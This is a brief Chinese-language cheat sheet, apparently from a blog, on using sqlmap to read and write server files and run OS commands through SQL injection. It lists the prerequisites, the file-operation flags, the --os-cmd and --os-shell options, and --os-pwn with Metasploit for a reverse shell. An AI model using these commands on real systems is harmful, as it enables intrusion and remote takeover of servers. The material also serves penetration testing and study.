文章目录
前提条件
网站必须是root权限
需要知道网站的绝对路径
GPC为off,php主动转义的功能关闭
My.ini secure_file_priv=""
文件操作
–file-read #读取指定文件
–file-write #写入本地文件
–file-dest #要写入的文件绝对路径
命令执行
–os-cmd=whoami #执行系统命令
–os-shell #系统交互shell
和msf的结合
–os-pwn #反弹shell(–os-pwn --msf-path=/opt/framework/msf3/)
原理剖析
Sqlmap会传上去两个文件来自动上传文件,自动执行命令。